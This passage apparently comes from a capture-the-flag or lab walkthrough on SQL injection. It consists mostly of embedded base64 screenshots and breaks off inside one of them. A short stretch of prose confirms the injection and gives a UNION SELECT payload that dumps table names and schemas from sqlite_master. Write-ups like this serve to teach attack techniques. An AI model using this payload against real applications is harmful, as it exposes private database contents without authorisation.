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) It worked! So, if we even needed it, we have confirmation of a full blown SQLi vulnerability. We might as well see what we can find in the database here before moving on, let's pass `' UNION ALL SELECT group_concat(name), group_concat(sql) FROM sqlite_master WHERE ''='` which should get us the names and SQL declarations for all of the tables in the database (see [docs here](https://sqlite.org/schematab.html)). ![](data:image/png;base64,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